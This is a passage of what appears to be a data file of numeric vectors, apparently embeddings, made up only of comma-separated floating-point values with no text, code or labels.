,0.0033173289,-0.009770262,0.012273076,0.0326523,0.008414585,-0.016433457,-0.0029098997,0.047760233,0.005472508,0.009032441,-0.00042320712,-0.013351314,0.017835515,-0.026856747,0.021090072,0.013344473,-0.0056647463,0.0035613854,0.020076888,-0.0053272177,0.003926204,-0.024859492,-0.035141964,-0.012467841,-0.0072095706,0.0032293578,0.043285657,0.034013037,0.026458269,0.021696273,0.013124182,-0.012226941,0.006256887,-0.02601614,-0.03233985,-0.011946306,-0.0038649465,-0.0053328364,0.03853249,0.016517993,-0.011456287,0.0067472626,-0.011265916,-0.002313064,0.016469872,0.01078222,-0.0039897095,0.0023043365,0.005279733,-0.013728458,0.011027766,0.018688114,0.0055463826,0.0017599526,0.019471245,0.00032901476,-0.02058684,-0.011706239,-0.02182812,-0.010587914,0.0320794,-0.008313894,0.015654,0.00070191006,-0.0055239624,-0.02849448,0.0063470057,0.012386685,-0.019147437,0.0149418125,0.011854332,-0.0019796065,-0.011055388,-0.007952332,-0.018422496,-0.0044515864,0.026347369,-0.004026762,0.0036127793,-0.031663883,0.009980823,0.014301101,0.004009206,-0.008494159,0.014061669,-0.013428294,-0.011718472,-0.0017430483,-0.016160425,-0.02317467,-0.018149614,0.018963955,0.020294107,0.00042892992,0.0030366725,-0.024684833,0.0018761263,-0.0068456954,-0.0033132848,0.0031682653,-0.013830756,0.002006224,0.004182462,0.0062842327,-0.00713795,-0.013958986,-0.0159552,-0.026520513,-0.033147436,-0.004696448,0.001053954,-0.002553037,-0.0010449559,-0.017468246,0.01763258,0.0064613856,0.007120341,-0.012857193,0.01486536,0.028607767,0.010951962,-0.0062302644,0.017329896,-0.020527465,0.01748543,0.0018525275,0.032900147,0.011086338,0.10884024,-0.012122227,-0.002537134,-0.0011769996,-0.0020598546,-0.0039481777,-0.006900915,-0.0036141176,0.00016032257,0.00004537643,0.021297645,0.0062466105,0.011214835,0.0020310315,0.010072335,0.025376674,-0.010328192,-0.0053102206,0.027553568,-0.0069472822,0.014904617,-0.0018292887,-0.0066144983,-0.031741165,-0.027805088,-0.06919068,0.042854622,0.023468094,0.015137729,0.027782405,0.013411183,-0.0091706,-0.0019614785,0.010660774,-0.021430705,0.016074738,0.010304903,-0.024765186,0.0001900226,-0.020292228,0.013123772,-0.002220797,0.009458742,-0.030048236,-0.02858767,-0.029584108,0.009756958,-0.015689816,-0.013681027,-0.015354915,0.004580802,0.007832859,0.015841007,0.0020886124,-0.0051185503,-0.016819194,-0.0044808513,0.0072838557,0.015059497,0.00431051,0.010391494,0.009454498,0.0099207945,0.019044127,0.023509057,0.014878674,-0.017313538,-0.009618795,-0.013542919,-0.026088264,0.035682704,0.00065179844,0.013502724,-0.025731519,0.010719907,-0.009052734,-0.0034049642,-0.006775135,0.022895511,-0.0016426715,0.0054781786,-0.00024943182,0.0069758627,-0.0044062487,0.011216661,0.0025848965,-0.010179411,-0.0021592742,0.013355066,0.0088729,-0.0017626497,0.018897414,0.024190547,0.038525954,-0.016223608,0.001976649,0.016396997,-0.011442282,-0.010488619,-0.008599895,-0.017529154,0.001171184,-0.0131636765,0.013198358,0.010158205,-0.020407673,0.016425293,-0.005967722,-0.0010408863,-0.002489072,0.00137644,0.02462685,0.00747907,0.022783525,0.012220493,0.01374377,-0.019587202,-0.010577094,0.01839764,-0.02261608,-0.0057164626,0.03183926,-0.0033578998,0.041900493,0.013557623,0.018907323,-0.01129792,0.010541737,-0.013502689,0.0024179728,-0.0017954739,-0.02628556,0.008522791,0.0031902643,-0.00068883353,-0.002669088,0.040032834,-0.0013302112,0.024266597,-0.02044653,0.010689564,-0.01296471,-0.0061699706,-0.011964093,0.014351337,-0.04246094,0.020196805,-0.0015292615,0.007872231,0.008199977,-0.019634752,0.018899584,-0.0096343085,0.01467697,-0.0025511414,-0.0012374958,0.0059079938,0.006112594,0.0010948498,-0.011842873,0.023489418,-0.009409198,0.01573307,-0.025830435,0.027480379,-0.016187027,0.014629684,-0.014157198,0.0018147825,-0.005038384,-0.016261183,-0.018621016,-0.0017998839,-0.011845557,0.0040630614,0.017375473,0.0010840133,0.010761864,0.006062154,-0.0020232243,0.010749338,0.0056611593,-0.0067317397,0.00459629,0.014658448,-0.024413476,0.005431928,0.0015734093,-0.02524261,0.03840443,0.021181334,-0.0038075552,-0.0037790409,0.019398833,-0.02130735,0.025359571,-0.014352261,0.033431306,-0.013340648,-0.037100486,0.023234908,0.0058474005,0.01992861,-0.009930983,0.016899861,-0.013953182,-0.006027491,-0.014620281,0.0043166033,-0.004848752,0.012991725,0.00063184754,-0.0047602113,-0.032876708,-0.0016246777,0.006130829,0.009504727,-0.020235507,-0.019246612,-0.010905901,-0.011086336,0.015553789,0.008711434,0.011355841,0.017704425,0.01082363,-0.020796662,-0.0032151835,0.015368759,-0.01706096,-0.017426701,0.0008718049,0.0051699164,0.0009129989,-0.016389364,0.021858115,0.019223735,0.013239473,0.009789596,0.02480362,-0.009287148,0.0077144313,0.023142768,-0.0042643235,-0.009681992,-0.007843636,0.006668734,-0.037051268,-0.0061779968,-0.008842869,-0.03372602,-0.012318091,0.010266055,-0.013652766,-0.0106766485,-0.010943533,-0.023089105,0.00004820629,0.004415902,-0.03138103,0.016176065,0.018847933,-0.015903233,0.015104466,-0.0036555906,-0.0043838234,0.0063569467,-0.008963732,-0.02102293,-0.011988015,0.003691047,0.0032675397,0.003922836,0.038073063,0.019446883,-0.008851434,0.009437745,-0.011528032,-0.019317547,-0.015246542,0.0083678,0.001049271,-0.005448493,-0.030605825,-0.0014176123,-0.026807256,-0.019351453,0.045067225,0.071177565,-0.05774069,-0.0025753414,0.009819721,-0.010935313,-0.036266886,0.013508026,0.02401365,-0.011277835,-0.024356874,0.02313444,0.0089768,-0.01557698,-0.04708674,0.012682353,-0.0011411604,-0.008187472,-0.018293355,0.010296212,-0.022268986,-0.013158247,0.024343405,0.010255586,-0.0017132193,0.00097535347,-0.011665402,0.006826462,-0.032400455,0.0022029665,-0.025048817,0.026291482,-0.0017047105,-0.00013283505,-0.01235153,0.0007116265,0.029725652,-0.010944447,0.03512132,0.010481327,0.0007534661,-0.029132096,0.007826064,-0.00326343,0.03496703,0.009419137,-0.025685463,-0.016967246,0.0033952028,-0.0038275095,0.11254747,-0.013747827,0.019087438,0.007901721,-0.0030728239,-0.017177299,0.010143841,0.02077873,0.008618074,0.009403034,0.0007935142,0.01050531,0.0050698402,0.047332853,0.008101921,-0.013424165,0.00017335678,0.101076275,-0.01316865,0.018794902,-0.0076198997,0.011168677,0.0024509556,0.013386949,0.029741341,-0.063337974,0.002708602,-0.028890908,-0.032848768,0.010884639,-0.018716205,0.022175007,-0.007628997,0.022902314,-0.0013497621,0.0042939764,0.019759329,0.0054152254,-0.020324571,-0.016301733,0.02538927,0.011174877,-0.005290337,0.0041787294,-0.023592174,-0.007328596,-0.04755667,0.013568622,0.006164126,0.037623152,0.0049470644,-0.003355413,0.010792312,0.014709654,0.023779104,0.008233012,0.011735273,0.0070346105,-0.034487896,0.012992875,-0.006117939,0.020096041,0.0005163871,0.012097854,-0.0043932265,-0.014994946,-0.014067736,0.027415985,0.011293925,0.013896504,0.040685248,-0.0044723363,-0.013178085,0.0044614277,0.04210974,-0.0015839256,-0.005007884,0.015690636,0.0076143253,-0.008063593,0.041675933,-0.0025558078,0.014015359,0.003576008,0.01080914,-0.0076860804,0.0031615894,0.018256137,0.03970354,-0.0032587002,0.01014317,0.014402303,-0.013036688,0.010965232,0.02622614,0.024267891,0.021620937,-0.0052532186,0.0029782287,-0.025819888,-0.017173065,-0.0014526162,-0.010877905,-0.005521482,0.0024779632,0.046693802,-0.019453501,-0.030844903,0.0022185966,-0.00051595265,0.006677234,0.025208944,0.005661987,0.010229613,-0.002984629,-0.007885222,-0.015126113,-0.010003994,-0.018438496,-0.0068514985,-0.004122865,-0.012023853,-0.005093715,0.007938099,-0.02144549,0.0012314636,0.012000837,0.00321626,-0.018737843,-0.0060875155,-0.029154444,0.005995672,0.0042490303,0.050736524,-0.013352447,-0.0035256504,0.004698195,-0.027023925,-0.025555039,-0.025644043,0.016472686,0.016931703,0.010116298,0.005778687,0.0109689515,0.0012453643,0.019966273,0.010074363],[-0.009664039,0.0018958063,-0.010181985,-0.02353692,0.01136182,-0.01570815,-0.01598243,0.013974404,-0.014884452,-0.019447966,-0.01829007,0.03973147,-0.008121318,0.0012306379,-0.010502624,-0.008231007,0.007605044,-0.001260149,-0.005488867,0.0074873976,0.011899947,-0.00022557814,0.017273204,-0.006165977,0.0039339312,0.004764483,0.0039403383,-0.005945704,-0.009225277,0.021031527,-0.0027926972,0.025219876,0.0017938724,-0.0033402701,-0.0035078228,0.0027060353,-0.017544772,-0.008900523,0.001197974,-0.011171204,-0.012170302,0.012925093,0.014085051,0.009402834,-0.0111393,0.0061484375,-0.013652329,0.0047715628,-0.027134601,-0.0026863392,0.015029481,-0.0100978445,-0.028118383,0.022777803,-0.008910336,0.031950027,0.002373,-0.015372867,-0.0025836807,-0.015670039,-0.0007566993,0.004763593,-0.019617928,-0.01995258,0.014131332,-0.032444764,0.011741639,-0.016635858,-0.02357158,-0.035365812,-0.0119034005,-0.009076674,0.006796219,0.016274862,0.004003849,0.023892717,0.008420573,-0.0036858255,-0.0376362,0.025439013,0.006255092,-0.0062680393,-0.003752327,0.0047802217,0.019735217,-0.0074409517,-0.00586272,0.0032729553,-0.020134212,-0.034477167,-0.01572796,0.009530583,0.0071528745,0.008362421,-0.010492568,0.013486803,0.016953457,-0.012664731,0.015610084,0.010074753,-0.014779478,0.00040078387,-0.03477406,0.014860369,0.008490357,-0.030384244,-0.007760143,0.00035866923,-0.00610049,-0.042739335,0.008808395,-0.003981186,0.0038881039,-0.0057053533,0.02049243,0.0047134464,-0.0061353147,0.006383887,-0.033037372,0.0024239672,-0.012547255,0.03700609,-0.00030492703,0.0077375066,-0.0033481522,-0.0022366687,0.0017620496,0.019692,-0.00062543544,-0.0035785649,-0.012459517,0.00897513,-0.017307678,-0.0067651677,-0.024116768,-0.0030596424,-0.0064337207,-0.019901896,0.011785738,-0.00016459342,0.0076295896,-0.008322117,-0.0018573456,0.020372564,0.0074316473,0.011153489,-0.001273515,0.002101486,0.008042906,0.0051639196,-0.0019646834,-0.011555992,-0.008091736,-0.030175967,-0.01484723,0.021574933,0.0031795288,-0.012407748,-0.013388782,0.022623347,-0.018379735,0.010068294,0.029213399,-0.023398597,0.003187339,-0.022699794,0.0029847755,-0.011281881,-0.022071458,0.00517821,0.03321545,0.030585533,0.0126947155,0.009296015,0.030513799,0.011034122,-0.0005188203,-0.024447866,-0.004344686,-0.008809733,0.017929683,0.017921668,-0.00097408926,0.0062711136,0.013302231,0.016181529,0.021116992,-0.010984102,-0.016467597,-0.011630883,-0.0033893539,-0.015906995,0.0022493438,-0.015356874,-0.007854831,-0.017764056,-0.011677366,0.09434115,0.007863449,-0.00677464,-0.016849352,0.01692643,0.0016902152,-0.022260904,-0.007683738,-0.000017963124,0.0053450014,-0.0070980005,-0.005156579,0.0048371446,0.010099218,-0.013820103,-0.009707204,0.0070593543,0.0032513107,-0.06202488,0.012255239,0.012843161,0.008391161,0.011991391,-0.014232971,0.009879388,0.015334056,-0.03690915,-0.025744662,-0.01170714,0.0021144324,0.0046924977,0.005709822,-0.014575683,0.0052260803,0.0052883257,-0.0083266385,-0.0074664135,0.017873475,-0.02761396,0.009965809,-0.01633332,-0.00016229585,-0.00015095618,0.0044618845,0.004628912,0.030702678,0.040005427,-0.024643663,-0.018430764,0.006779077,0.018975645,0.008229421,0.023816926,0.027985845,-0.024925927,-0.0036453875,0.024948899,-0.004739487,-0.017956885,0.008569368,-0.017416164,0.018588975,-0.00051319925,0.022484485,0.007923742,-0.0065957857,0.027243553,0.04811742,-0.0021002078,-0.00008580044,-0.0222521,-0.003258823,-0.03052011,-0.012414052,0.015433624,-0.011669724,-0.0012023448,-0.0024478456,-0.0054738857,0.020228151,-0.004464935,0.0056962185,0.013198586,-0.00004132715,0.0043544956,-0.009581733,-0.01561471,-0.001669863,0.0017012599,-0.0037291679,-0.001921186,0.039108295,-0.0036131304,-0.011434768,0.0100363055,0.03344403,0.0028988225,-0.0022756662,-0.0061431336,-0.008317054,0.008311479,0.010660636,-0.018077286,0.029253239,-0.008174991,0.026717862,-0.00017910375,0.00018207458,-0.011663891,0.008711958,0.04127805,-0.031370156,-0.0027560915,-0.007897374,0.00070531556,-0.022639055,-0.027441818,-0.0080789495,0.008526426,-0.02162107,-0.02468582,-0.015631054,0.0129852425,0.03168409,-0.025376815,-0.0049057407,-0.02420161,-0.016887056,0.005512791,0.0049433974,0.023518885,-0.00049648056,-0.0017606368,0.012511125,-0.009158996,0.02562036,0.009410088,-0.012001895,0.024307547,-0.010673677,0.025368556,-0.0012962327,-0.0057508484,-0.008688005,-0.0052095554,-0.026858076,-0.0038320017,-0.0027478721,-0.02653249,-0.0006312929,-0.0010413972,0.01966113,0.017698567,0.019019457,0.006253545,0.005726233,0.016782295,-0.008961545,0.012914782,-0.020226965,-0.018312937,0.011793261,-0.016066195,0.017483585,0.0016616021,-0.018536223,-0.0032111558,0.06045988,-0.013867793,-0.0133154355,0.0054536643,-0.021323318,0.00022221981,0.019021796,0.020608863,0.010164322,-0.0156108625,-0.008839027,-0.025760986,0.0044989227,-0.0016876468,-0.023065204,0.002135478,-0.018589329,-0.009082255,-0.032753903,-0.007920396,0.03175302,-0.024400203,-0.0107577,0.0135821635,0.013834264,0.017348086,0.0035398023,0.018382933,0.009856321,-0.030689886,-0.0027084665,0.005430104,0.0057949317,0.0040754112,-0.029818824,0.0034580904,0.003500768,0.017342301,-0.0008643261,-0.0054344623,0.0074703638,0.009436037,-0.0015032978,-0.02032884,-0.014536561,0.042924426,0.011077863,-0.0056538247,-0.0021182082,0.019926894,0.0095019685,0.040708628,-0.027486341,0.01182786,0.00034571736,0.01034068,0.024903446,-0.03341983,0.03182347,0.031119345,0.025157958,0.03437251,-0.011725827,-0.0012634223,0.0035323,0.045577403,0.0024755292,-0.009128765,0.0014786838,0.007646237,-0.00371349,0.006033918,-0.011509368,0.0042408924,-0.0129166525,0.017275695,0.0035326667,0.00081151683,-0.0031533446,0.013994066,-0.019444644,-0.0029726923,-0.0024864585,0.008440042,-0.012866273,-0.0015830914,0.008241669,0.0043852488,0.01886482,-0.021198047,-0.0032720075,0.015204676,0.007565408,0.00023814205,0.03658363,0.019407595,0.015092527,0.037745778,0.009981179,0.022613484,0.00389848,-0.020945672,-0.0031637072,-0.031204468,-0.0019702695,-0.013811869,0.019694364,-0.0037186253,-0.0033978142,0.01765622,0.006292207,-0.005642113,0.0075450446,-0.011248279,-0.0097084185,-0.01588385,-0.018065073,-0.0062139593,-0.01728486,0.008893332,0.018434798,0.011014675,0.008515402,0.0032043483,0.0016599578,0.008653473,0.0031188235,-0.0022086317,0.021936053,0.0049792887,0.001985801,0.019959768,0.009498202,-0.03393556,0.004383281,0.004507629,-0.021567717,-0.030618899,0.032545496,0.005530647,0.018617155,0.0112767955,0.023379687,0.017092578,0.00209526,0.028492859,0.04646352,0.009423659,-0.012260368,-0.002460029,-0.013896954,0.009821782,-0.0073868185,-0.022774072,-0.013983147,0.009365775,0.029639505,-0.014307395,-0.042242683,0.00465662,0.021490969,-0.022812143,0.016834935,0.0025201738,0.0119601395,0.023468912,0.017387616,0.04889437,-0.001859901,-0.0400201,-0.010046508,0.008915548,0.01562733,0.017099202,0.007840856,-0.023945808,0.017152388,-0.0015325862,0.010472415,0.020194123,0.02195749,-0.02186844,0.000880117,0.0113592455,-0.012728071,-0.010267609,-0.0043831356,0.0002232946,-0.003861392,-0.011871625,-0.025815861,-0.005915408,0.009107368,0.025434643,0.010409639,-0.019486252,0.0018798023,-0.0051613958,-0.00017817543,0.025374424,-0.0011815157,0.0024107986,-0.0012278025,0.016538108,-0.0053704116,-0.0032728105,0.016196676,0.004068324,0.0014914937,0.023266472,0.018622223,0.015187207,-0.0034858526,0.0022534647,0.01483942,0.02161838,-0.009842603,-0.011228005,0.020209989,0.0043179705,0.014069683,-0.01842665,-0.0024881468,-0.0048140977,0.0033697374,-0.013659943,0.0012184577,-0.007649345,0.006730586,-0.0053374153,-0.023697197,-0.015472049,-0.014082136,0.0125503,-0.010402736,-0.009220957,-0.026030667,0.014490914,0.007579843,-0.012119691,-0.014752786,0.0038626066,-0.0056969873,-0.012008013,0.015350789,0.0072377697,-0.018166913,0.001388513,0.01897101,-0.004322901,-0.0077435765,0.0035595177,0.00062778435,-0.010751105,-0.012347746,-0.011983326,-0.029274344,-0.010278984,-0.021675149,0.019467419,0.013097546,0.010169986,-0.0007489716,0.010844884,-0.028495796,-0.008110624,0.02252376,-0.022583842,-0.0048030186,-0.0058522266,0.005254457,-0.017403355,-0.012670486,0.00012901581,0.005600548,-0.0058153234,-0.009395591,0.014288366,-0.07400874,-0.015663074,0.010725005,0.015464392,-0.0055556204,0.049232084,-0.0095287515,0.010358318,0.002032837,0.003569243,-0.002833683,-0.016864391,0.005880418,0.015771078,0.0048516663,-0.01446514,-0.023346543,-0.009516284,-0.031826083,-0.030792512,-0.010341694,0.04957156,0.008225207,0.011830906,-0.00239696,0.007858443,-0.012836286,0.0035608823,0.011213961,-0.0347661,0.002825687,0.021192482,0.002468535,0.020993428,-0.026184816,-0.02226435,-0.009971935,-0.0066623595,-0.020870663,-0.001063677,-0.0038005773,-0.0021439013,-0.01519859,0.0068301843,-0.006551578,0.04024237,-0.013154716,0.013971591,0.012509027,0.020886322,0.018699007,0.004479818,-0.00973801,-0.0012035068,-0.011078015,0.012442069,0.007602454,0.021532226,0.008842534,0.0058999653,-0.0060102493,0.014199233,0.013601659,-0.02707297,0.019652879,0.030061124,0.023888076,0.013200424,0.031178927,0.00031225898,0.033298753,-0.0010250815,0.0015915593,-0.0028122445,0.018816167,0.03187462,0.018922672,-0.007356208,-0.00355797,-0.011249124,-0.006831699,-0.033835337,0.006720705,0.027978458,-0.009863259,0.011292891,-0.002729656,-0.010379269,0.015090493,0.013785019,-0.015358033,-0.015733872,-0.0015599398,-0.0086661205,-0.012277934,-0.025338585,0.0039944397,-0.03509622,-0.009975343,0.00013835981,0.0017404509,-0.009815294,-0.010430075,0.0024527735,0.024338907,-0.01282519,-0.01493234,-0.04534262,0.0018714314,0.006104075,-0.010097814,0.0055649076,0.012703562,0.011909739,0.0043127094,0.038978904,-0.01873503,0.0074326876,-0.0009393527,-0.008989006,0.019839283,-0.0075207124,0.031776227,0.009854103,-0.026198586,-0.0020720826,-0.0032395648,0.00071684294,0.0014890799,-0.0052039647,0.021837726,-0.010096693,-0.015159668,-0.003595117,-0.023886105,-0.0047033536,0.0070030154,-0.024144426,-0.013543306,-0.0146070225,0.010705058,-0.005188945,0.008356944,-0.018746411,0.017262392,0.036211282,-0.0031660364,0.0152802,-0.0149030695,0.018826671,0.025204625,0.035774127,-0.002978498,-0.015572782,-0.0063439985,0.020874448,-0.013726189,0.010214817,-0.0066256835,-0.026689775,-0.019775683,-0.038800888,0.010073749,-0.020709317,0.010322342,-0.004141712,0.0011927477,0.03434289,-0.01734952,0.017048018,0.024780642,-0.008157352,0.0162397,-0.028306173,0.003993093,-0.02330333,-0.028266082,0.024377413,-0.025183402,0.039172422,0.021258395,-0.03680207,-0.014623479,-0.011366805,-0.001989067,-0.026302803,0.020443058,0.021871805,-0.009547952,-0.031851277,0.0061732563,-0.0051056347,0.015516054,-0.026916465,0.009822167,0.0012870325,-0.0054213423,0.0176176,0.026731486,-0.020022376,0.006833513,0.012899385,-0.018855304,0.025082137,-0.016724218,-0.011410025,-0.014766095,0.024989255,-0.013800634,-0.004170129,0.030355845,-0.003311099,0.009360373,0.018830918,-0.012082456,0.01034774,-0.0005916976,-0.03561327,-0.013850659,0.003002582,0.0058753737,-0.010539008,0.004007292,0.0070285285,-0.004785639,0.0009253779,-0.007881023,0.027842173,0.0085643055,0.023251642,0.0012180486,0.009309137,-0.013903192,-0.0059051393,0.0029023404,-0.003800476,0.010512212,-0.010944919,-0.001152893,0.018082792,0.0139361555,-0.016737092,-0.022084601,0.01014543,0.011328882,0.0060962974,0.034198526,-0.0036860555,-0.006260955,-0.0028864776,0.0102696195,-0.03361127,0.016346924,-0.008426349,0.011579757,0.0332094,-0.006382903,0.008309501,0.01099904,-0.007212735,0.018371617,-0.0040868837,-0.0034084963,-0.020441882,-0.0017755,-0.0015838755,0.0064427196,0.00936817,-0.02487839,-0.010047212,0.002638299,0.004834859,-0.014314359,0.011944254,-0.01596248,-0.020794798,-0.0024918644,-0.0007776803,0.008490923,0.0054840697,-0.0069101206,0.013173311,0.020936769,0.0008330751,0.011295439,-0.014470555,-0.012650156,-0.018563269,0.010355502,-0.005121063,-0.004484202,-0.0059464187,0.020771021,-0.0024065434,-0.010795753,0.002912551,-0.06718154,0.01794434,-0.016788363,-0.021851141,0.009267743,0.01855226,0.01877797,0.0060699293,0.029704574,-0.010462673,0.014451201,0.005854801,0.011052336,0.013363332,-0.0022999893,-0.002012077,-0.03031601,0.010504724,0.027037064,-0.00391762,-0.009638593,-0.005566589,0.025292225,0.007984186,0.041754253,0.0056267143,-0.008792246,0.000323598,-0.031938214,0.009349589,-0.013511239,0.014044927,-0.006811116,-0.00007390822,-0.023289274,-0.014162904,0.0011816475,0.00011035125,-0.012142664,-0.006924726,-0.016450616,0.00019497292,-0.007109606,0.029752428,-0.015129441,-0.017802907,0.014020552,-0.008206772,-0.0062684757,-0.016189622,0.018224066,0.005854446,0.011343347,0.0043134936,-0.016588299,0.04665343,-0.010466215,0.013556885,-0.000074341166,-0.00033102278,0.013229943,-0.008351504,0.011161691,0.011173205,-0.021028,-0.009039684,-0.006504929,0.036570653,0.004674811,-0.026056835,0.001113671,-0.015162909,0.014209041,-0.01986789,-0.02320286,0.024046335,-0.015485137,0.003631726,-0.0012180672,-0.014563038,-0.02303983,0.030371083,-0.017013442,0.006543577,-0.032126512,-0.0123366155,0.0050164433,0.016767906,0.011542239,-0.010488381,0.012729676,-0.003759684,-0.0067471485,0.028661013,0.011524155,0.031051727,0.00249757,-0.0028047955,-0.00677064,-0.010267108,0.01113717,-0.004945417,-0.0033629725,0.047427744,-0.0040921094,0.0006322645,0.0028153257,0.0060087405,0.024139546,0.030467106,-0.013606836,0.0025700505,0.0061823293,0.0015305585,0.007956112,0.0055474783,-0.0013084125,0.008357366,0.00024519852,0.017910045,0.0034907188,-0.015855264,0.006154885,0.015740322,-0.000735252,0.011478389,0.0029867622,-0.014558847,-0.015504137,0.0053785234,0.022288429,0.033523005,-0.012862635,-0.017333016,0.010210822,0.00953388,-0.0039132526,-0.023152458,-0.02202984,-0.0017439469,-0.039555077,0.0001720979,-0.016235735,0.0063915164,-0.011060186,-0.019242816,-0.0031013463,0.008969356,0.01350942,-0.0026769787,0.010202344,0.02112892,0.008444474,0.0051559717,0.010206455,0.020665921,0.013197335,-0.025784547,-0.0027568182,0.016795231,0.00041459603,-0.008240138,0.00638951,0.0056548957,-0.034714367,0.01704168,-0.014838241,-0.009221634,-0.015644085,-0.0047355965,-0.008456089,0.014537437,-0.017009875,0.023709252,-0.0010355719,-0.028704882,0.021463297,0.0041491394,-0.011972556,0.0066967425,0.01075886,0.031686116,0.012472746,0.0025849717,0.024494061,-0.02728234,-0.010480268,-0.010752353,-0.020584194,-0.03296987,-0.003536978,-0.009817518,0.008446278,0.008546913,-0.024166364,0.03727394,0.0042268243,0.016105343,-0.002461704,-0.025803914,-0.02716404,0.012831548,-0.0026814595,0.006946087,-0.02285764,0.017404191,0.020876478,-0.035603136,0.005256669,-0.0022042557,-0.022433959,-0.0018548439,0.007928298,0.008486048,-0.0202504,0.00078979955,-0.012525891,0.0010136279,0.0040998883,-0.0072691184,0.011362893,0.016664129,0.011832509,-0.0070111062,-0.004292277,-0.011890401,0.016830007,0.012385899,-0.006475262,-0.014132585,0.019029925,-0.025502548,0.033490557,0.0034689165,-0.013200535,0.018372484,0.012195185,0.0071139024,-0.024312152,-0.009936103,-0.000795426,-0.011618389,0.011224586,-0.000087110224,-0.023539267,0.030352503,0.006285958,0.002438633,0.005825091,0.028990362,0.0023155548,0.004876609,-0.007888383,-0.014731742,-0.02232367,-0.018069837,-0.0068378686,-0.024183873,0.013259632,-0.0174469,-0.025316028,-0.013526248,-0.010245052,-0.005249125,-0.03338975,-0.0077348743,0.003699681,-0.009443088,0.025567671,-0.017478907,-0.0027350008,0.008494382,-0.0015947307,0.00924449,-0.0030921388,0.008819459,-0.0034450667,0.0041865217,0.016798783,0.020302385,0.0070741526,0.008987231,0.024237664,-0.008282539,0.020524504,0.013161984,0.015698705,-0.017877445,0.05446141,-0.001047743,-0.015387384,-0.006794263,-0.011948945,0.023597896,0.024039535,0.0126050925,-0.008607732,0.0043054153,0.019379778,-0.016267402,0.07026687,-0.0021646526,-0.007370945,-0.020306973,0.005270283,-0.016474176,0.019812783,0.008701108,-0.001202115,-0.00859486,-0.036230624,-0.016717527,0.0036943047,0.0039377995,0.0141878305,-0.010525973,-0.00036445927,-0.0042772642,0.020991221,0.0071423613,0.020995164,0.019821564,-0.013903553,0.011472998,0.0015827233,0.005733475,0.020287126,-0.0006939323,-0.003048687,0.0019737226,0.00014235187,-0.0044556507,0.015395118,0.0026431552,-0.009324464,-0.0058393157,-0.0010902449,-0.012436003,-0.02552203,0.004304248,0.00054006063,-0.007869429,0.03882499,0.016263815,0.006497045,-0.030121133,-0.0010374123,-0.0076374183,0.01235422,-0.014334152,0.009535928,0.0005745388,0.008373665,0.011844328,0.0092442995,-0.0053981985,-0.004000122,0.0198886,0.02376117,-0.014093546,0.013402828,0.022986026,0.018452423,-0.01018016,-0.0017499998,0.0025657895,-0.0027962946,-0.0034466977,0.032717466,-0.039000068,0.023837905,-0.018942067,0.017296962,0.010528359,0.0004099611,0.015974356,0.02147434,0.0038371405,-0.007954977,-0.022641022,-0.018758183,-0.00083590864,0.02982667,0.011049174,-0.013331028,0.0050527663,0.015396432,0.011522033,0.036806583,0.013594057,0.014425305,0.007301536,0.0022226204,0.019627132,-0.001636385,0.014595519,0.0128760105,0.015068237,-0.009434343,0.015529945,-0.0051624966,0.0022940082,0.029258866,-0.011100442,0.0007626867,-0.021173686,0.022240419,-0.030290063,0.011271709,0.014118889,0.015562861,0.022926738,-0.0043623615,0.004268236,0.0031028795,-0.0044023665,0.008019518,-0.0076552825,0.010081954,0.011325016,0.007589479,0.007574854,0.0026705316,-0.068838805,0.028712714,0.14479452,0.0056045465,0.016358618,0.013689866,0.0035516818,0.0016204613,-0.14660832,-0.0021573964,-0.00405046,0.0066834735,-0.01864296,-0.017643342,-0.0059593036,0.010750404,0.007221987,0.0098063955,-0.009915246,-0.023632482,0.03134497,-0.011333563,0.0023058043,0.0051551354,-0.0015457326,0.021669231,-0.013481457,-0.014337574,0.013573244,-0.009840049,-0.0252546,-0.009658228,-0.00356319,-0.017023,0.022250773,-0.008868691,-0.01833182,0.003342998,0.020381436,0.017342819,-0.03320113,-0.02635867,0.030404495,-0.013425688,-0.02504245,-0.039390836,-0.15088008,0.020179426,-0.005728312,-0.027673513,0.021655934,-0.009470469,-0.010824432,-0.017860416,0.018097045,-0.021728499,0.0120016085,0.01269954,-0.0016410078,-0.008991807,-0.007985722,-0.015571288,-0.0018976171,0.013925763,0.014506548,0.0036997304,0.021502031,-0.005623931,-0.0028743895,-0.01858666,-0.036254883,0.0074551385,0.014586962,-0.0054852297,0.012994951,-0.004191066,-0.022673758,-0.000041549694,-0.01643516,0.0008473604,-0.02219251,-0.0074566803,-0.0066773323,0.006135025,-0.01102635,0.027374452,0.0039634453,-0.006348907,0.00058786426,-0.0006646711,0.0028058111,0.016393533,0.014802032,0.010266065,0.0065196324,0.0013206536,0.022783317,0.013403502,-0.014578806,0.016858714,-0.019013157,0.0131300995,-0.0152944485,-0.03156921,0.0048659514,0.010542066,-0.01048489,-0.008494014,-0.004749599,0.0012358358,0.019096041,-0.003895663,0.011254824,-0.038234577,-0.0033586158,0.013728667,-0.00015613771,0.008188425,0.008291375,-0.01475798,0.00069928815,0.01619869,-0.0068936716,0.013009489,0.02085078,-0.02803615,0.033284307,-0.017203309,-0.00940332,-0.036896106,0.007233842,-0.0006674332,0.01208438,-0.0033716871,-0.012465045,-0.01720431,0.026710257,-0.01632968,0.0068366323,-0.0038803252,0.035262004,0.015034555,0.0316859,-0.0056306566,-0.046584044,0.0082405,0.0021469772,-0.0051621078,-0.011502659,0.0019943365,0.0013015437,0.0064726393,-0.005057628,-0.011412402,-0.007934737,0.0074315313,0.008790128,-0.022513073,0.026055891,-0.0026524868,-0.030001333,-0.009894442,-0.012008085,0.011395123,-0.012147866,-0.019791622,-0.026393142,0.0189879,0.00066262565,-0.0028625608,0.0359002,0.027482105,-0.024057955,-0.000060594743,0.006903414,0.025973303,-0.012981794,-0.0029363919,0.0019756702,0.008566246,0.01549136,0.004100777,-0.004099842,-0.0011999813,-0.043767646,-0.013473262,-0.0006334107,0.011930626,-0.0014653748,0.003967646,0.009326378,-0.0055502076,0.043797813,-0.0021124438,0.00034363972,0.0019581537,0.00017216374,0.027386388,-0.015756803,-0.008858992,0.010346674,0.054130867,0.009584075,-0.019378165,0.016890781,0.0035723427,0.006620632,0.022245884,-0.0199871,-0.0012963737,-0.025968583,-0.024811698,-0.006435856,-0.016925676,0.0039440794,-0.02909977,0.04266478,0.011148904,0.025528671,-0.014813724,0.032682907,0.020525133,-0.0033516542,-0.016874997,0.01418538,0.020434495,-0.005228962,0.0097214235,0.01555945,-0.012222283,0.006452591,0.008740826,-0.008256088,0.0131227905,0.001991955,-0.002356694,-0.048174717,-0.005676083,-0.010538663,-0.002500992,-0.015480587,0.014966506,-0.0004013399,0.007455784,-0.036680065,0.00069046224,-0.02467735,-0.0119742